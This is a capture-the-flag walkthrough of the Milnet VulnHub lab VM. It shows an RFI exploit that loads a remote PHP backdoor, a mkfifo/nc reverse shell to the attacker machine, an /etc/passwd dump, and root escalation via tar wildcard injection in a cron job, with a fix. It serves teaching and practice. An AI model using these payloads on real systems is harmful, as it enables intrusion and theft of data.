Mr_H4sh

Infosec, CTF and more

Milnet Solution

In this post I’m going to show you how to solve the Milnet VM provided by Warrior.

You can find the VM on VulnHub.

192.168.56.102 <== attacker
192.168.56.101 <== victim

I run nmap to check which services are running on the machine:

# Nmap 7.12 scan initiated Sat May 21 23:11:46 2016 as: nmap -sV -p- -Pn -n -v -oA 192.168.56.101_version_full 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.000079s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.35
MAC Address: 08:00:27:5B:0C:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 21 23:11:57 2016 -- 1 IP address (1 host up) scanned in 11.73 seconds

So, I have port 22 and port 80 open. I open the website on http://192.168.56.101 and find a page with three links, each loading its target in an iframe. I run nikto and this is what I find:

 
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2016-05-21 23:18:43 (GMT1)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2016-05-21 23:18:56 (GMT1) (13 seconds)
---------------------------------------------------------------------------

The page http://192.168.56.101/info.php does indeed show the PHP configuration of the site. Tasty for us, since it tells us what we can get away with: a remote include only works when allow_url_include and allow_url_fopen are On, and phpinfo() lists both. I have a look at /content.php and find out that its route parameter, sent in the POST body, is vulnerable to Remote File Inclusion (RFI). I serve a simple PHP backdoor (it runs whatever arrives in the cmd parameter through the shell and prints the output) from a web server on my machine, reachable at http://192.168.56.102:8080/simple-backdoor.txt, and include it. The trailing ? is a habit worth keeping: if the include appends a suffix such as .php to the supplied path, the suffix lands in the query string of the request to my server and the right file is still fetched. This is what happens:

POST /content.php?cmd=whoami HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.56.101/nav.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

route=http://192.168.56.102:8080/simple-backdoor.txt?


HTTP/1.1 200 OK
Content-type: text/html; charset=UTF-8
Connection: close
Date: Sat, 21 May 2016 23:55:02 GMT
Server: lighttpd/1.4.35
Content-Length: 80

<pre>www-data
</pre>

I go ahead and open a reverse shell to port 443 on my machine. The payload is the usual mkfifo/nc one-liner, sent in the cmd parameter of the same include; note that the & in 2>&1 has to be sent as %26, otherwise the query-string parser treats it as a separator and everything after it is lost:

# ON MY LOCAL TERMINAL
# nc -lvp 443
listening on [any] 443 ...


# ON THE SERVER
POST /content.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.102+443+>/tmp/f HTTP/1.1
Host: 192.168.56.101
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.56.101/nav.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

route=http://192.168.56.102:8080/simple-backdoor.txt?

And I’m in. I wander around and I fetch the /etc/passwd file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
langman:x:1000:1000:T. G. Langman,,,:/home/langman:/bin/bash

I go to langman's home folder and find several files:

pwd 
/home/langman
ls -la
total 40
drwxr-xr-x 4 langman langman 4096 May 21 22:27 .
drwxr-xr-x 3 root    root    4096 May 21 15:45 ..
-rw------- 1 langman langman    6 May 22 00:29 .bash_history
-rw-r--r-- 1 langman langman  220 May 21 15:45 .bash_logout
-rw-r--r-- 1 langman langman 3771 May 21 15:45 .bashrc
drwx------ 2 langman langman 4096 May 21 15:48 .cache
-rw-r--r-- 1 langman langman  675 May 21 15:45 .profile
-rw------- 1 langman langman 4452 May 21 22:27 .viminfo
drwxrwxr-x 2 langman langman 4096 May 21 22:25 SDINET
cd SDINET
ls -la  
total 396
drwxrwxr-x 2 langman langman   4096 May 21 22:25 .
drwxr-xr-x 4 langman langman   4096 May 21 22:27 ..
-rw-rw-r-- 1 langman langman  74745 Feb  3  1992 DCA_Circular.310-P115-1
-rw-rw-r-- 1 langman langman  21837 Jun 26  2014 DefenseCode_Unix_WildCards_Gone_Wild.txt
-rw-rw-r-- 1 langman langman  46170 Sep 21  2009 FUN18.TXT
-rw-rw-r-- 1 langman langman   6337 Jun 15  2001 compserv.txt
-rw-rw-r-- 1 langman langman    766 May 24  1994 fips-index.
-rw-rw-r-- 1 langman langman 108282 Sep 30  1991 fips_500_166.txt
-rw-rw-r-- 1 langman langman  23135 Sep 30  1991 fips_500_169.txt
-rw-rw-r-- 1 langman langman  25048 Sep 30  1991 fips_500_170.txt
-rw-rw-r-- 1 langman langman  16044 Sep 30  1991 fips_500_171.txt
-rw-rw-r-- 1 langman langman   7534 Sep 30  1999 pentagon.txt
-rw-rw-r-- 1 langman langman   2894 Jul 10  1991 sec-8901.txt
-rw-rw-r-- 1 langman langman   3451 Jul 10  1991 sec-8902.txt
-rw-rw-r-- 1 langman langman  13214 May 21 22:19 sec-9540.txt
-rw-rw-r-- 1 langman langman  19858 May 21 22:15 sec-9720.txt

I wander around and find something interesting in /etc/crontab:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root  /backup/backup.sh
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

The creator of the VM did a very good job tucking /backup/backup.sh into the first row, right under the column header, where it is very easy to miss: it runs as root every minute (*/1 in the minute field). The script is the following:

 
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *

The job runs as root, cd's into /var/www/html (a directory www-data can write to, as the files I create there below show) and lets the shell expand an unquoted * into tar's argument list. That is exactly the setup for the tar wildcard injection described in point 4.3 of http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt (the same paper that sits in /home/langman/SDINET): file names beginning with -- are handed to tar as if they were options, so a file named --checkpoint=1 next to one named --checkpoint-action=exec=sh exploit.sh makes tar run exploit.sh, as root, the next time cron fires. After dropping the files I wait up to a minute for the job:
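To see the mechanism without a root cron job, here is an added example (mine, not from the post or the VM) that reproduces the same tar invocation in a scratch directory: the dropped file names are the real ones, but exploit.sh only creates a marker file instead of copying /root. It then runs the backup again with -- terminating option parsing, which is the one-token fix for backup.sh. Assumes GNU tar (the checkpoint options are GNU-specific); every path is created with mktemp.

```shell
#!/bin/sh
# Added example, not from the original post or the VM: reproduces the tar
# checkpoint wildcard injection from /backup/backup.sh in a throwaway
# directory, without root, then runs the fixed invocation. Assumes GNU tar.

# Build a scratch "web root": two ordinary files, the payload script, and
# the two option-shaped filenames dropped by www-data in the post.
# $1 is the marker file exploit.sh will create (stand-in for cp -R /root/*).
setup_webroot() {
  dir=$(mktemp -d)
  printf 'hello\n' > "$dir/index.php"
  printf '<?php phpinfo(); ?>\n' > "$dir/info.php"
  printf 'touch "%s"\n' "$1" > "$dir/exploit.sh"
  touch "$dir/--checkpoint=1"
  touch "$dir/--checkpoint-action=exec=sh exploit.sh"
  printf '%s' "$dir"
}

# The job as written in /backup/backup.sh: cd into the directory and let the
# shell expand an unquoted *. The option-shaped names become tar options, and
# tar runs "sh exploit.sh" via /bin/sh -c at the first checkpoint.
backup_vulnerable() {
  (cd "$1" && tar cf "$2" * 2>/dev/null) || true
}

# Fixed job: "--" ends option parsing, so every name * expands to is a file
# operand, option-shaped or not. Prefixing the glob (./*) does the same.
backup_fixed() {
  (cd "$1" && tar cf "$2" -- * 2>/dev/null) || true
}

# Run one variant ("vulnerable" or "fixed") end to end. Returns 0 if
# exploit.sh executed (the marker exists afterwards), 1 otherwise.
demo() {
  marker=$(mktemp -u)
  archive=$(mktemp -u).tar
  dir=$(setup_webroot "$marker")
  "backup_$1" "$dir" "$archive"
  if [ -e "$marker" ]; then status=0; else status=1; fi
  rm -rf "$dir" "$archive" "$marker"
  return $status
}

for variant in vulnerable fixed; do
  if demo "$variant"; then
    echo "$variant: exploit.sh ran with tar's privileges"
  else
    echo "$variant: exploit.sh did not run"
  fi
done
```

The same pattern bites other tools fed an unquoted glob (chown, chmod, rsync are covered in the paper), and the cure is the same: terminate option parsing with --, or anchor the glob with ./ so no operand can start with a dash.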

www-data@seckenheim:/tmp$ echo "cp -R /root/* /tmp/root; chmod -R 777 /tmp/root" > /var/www/html/exploit.sh
www-data@seckenheim:/tmp$ cat /var/www/html/exploit.sh
cp -R /root/* /tmp/root; chmod -R 777 /tmp/root
www-data@seckenheim:/tmp$ mkdir /tmp/root
www-data@seckenheim:/tmp$ touch /var/www/html/--checkpoint=1
www-data@seckenheim:/tmp$ touch /var/www/html/--checkpoint-action=exec=sh\ exploit.sh
www-data@seckenheim:/tmp$ ls -l /var/www/html
total 128
-rw-r--r-- 1 www-data www-data     0 May 23 23:19 --checkpoint-action=exec=sh exploit.sh
-rw-r--r-- 1 www-data www-data     0 May 23 23:19 --checkpoint=1
-rw-r--r-- 1 root     root     73450 Aug  6  2015 bomb.jpg
-rw-r--r-- 1 root     root      3901 May 21 18:56 bomb.php
-rw-r--r-- 1 root     root       124 May 21 17:50 content.php
-rw-r--r-- 1 www-data www-data    48 May 23 23:18 exploit.sh
-rw-r--r-- 1 root     root       145 May 21 17:17 index.php
-rw-r--r-- 1 www-data www-data    20 May 21 15:54 info.php
-rw-r--r-- 1 root     root       109 May 21 18:53 main.php
-rw-r--r-- 1 root     root     18260 Jan 22  2012 mj.jpg
-rw-r--r-- 1 root     root       532 May 21 23:33 nav.php
-rw-r--r-- 1 root     root       221 May 21 23:33 props.php
-rwxr-xr-x 1 www-data www-data     8 May 23 23:15 shell.sh
www-data@seckenheim:/tmp$ cd /tmp
www-data@seckenheim:/tmp$ ls -l
total 48
prw-r--r-- 1 www-data www-data     0 May 23 23:20 f
drwxrwxrwx 2 www-data www-data  4096 May 23 23:20 root
drwx------ 3 root     root      4096 May 23 22:27 systemd-private-565c60ab06bd4f8a9f3425a2fcac41cc-systemd-timesyncd.service-R3SBgL
www-data@seckenheim:/tmp$ cd root
www-data@seckenheim:/tmp/root$ ls -l
total 4
-rwxrwxrwx 1 root root 1727 May 23 23:20 credits.txt
www-data@seckenheim:/tmp/root$ cat credits.txt
        ,----,                                                               
      ,/   .`|                                                               
    ,`   .'  :  ,---,                          ,---,.                        
  ;    ;     /,--.' |                        ,'  .' |                  ,---, 
.'___,/    ,' |  |  :                      ,---.'   |      ,---,     ,---.'| 
|    :     |  :  :  :                      |   |   .'  ,-+-. /  |    |   | : 
;    |.';  ;  :  |  |,--.   ,---.          :   :  |-, ,--.'|'   |    |   | | 
`----'  |  |  |  :  '   |  /     \         :   |  ;/||   |  ,"' |  ,--.__| | 
    '   :  ;  |  |   /' : /    /  |        |   :   .'|   | /  | | /   ,'   | 
    |   |  '  '  :  | | |.    ' / |        |   |  |-,|   | |  | |.   '  /  | 
    '   :  |  |  |  ' | :'   ;   /|        '   :  ;/||   | |  |/ '   ; |:  | 
    ;   |.'   |  :  :_:,''   |  / |        |   |    \|   | |--'  |   | '/  ' 
    '---'     |  | ,'    |   :    |        |   :   .'|   |/      |   :    :| 
              `--''       \   \  /         |   | ,'  '---'        \   \  /   
                           `----'          `----'                  `----'    
                                                                             

This was milnet for #vulnhub by @teh_warriar
I hope you enjoyed this vm!

If you liked it drop me a line on twitter or in #vulnhub.

I hope you found the clue:
/home/langman/SDINET/DefenseCode_Unix_WildCards_Gone_Wild.txt
I was sitting on the idea for using this technique for a BOOT2ROOT VM prives for a long time...

This VM was inspired by The Cuckoo's Egg. 
If you have not read it give it a try:
http://www.amazon.com/Cuckoos-Egg-Tracking-Computer-Espionage/dp/1416507787/

Thanks to Warrior for the VM and to VulnHub for hosting it. For any questions or comments, please do not hesitate to leave a comment.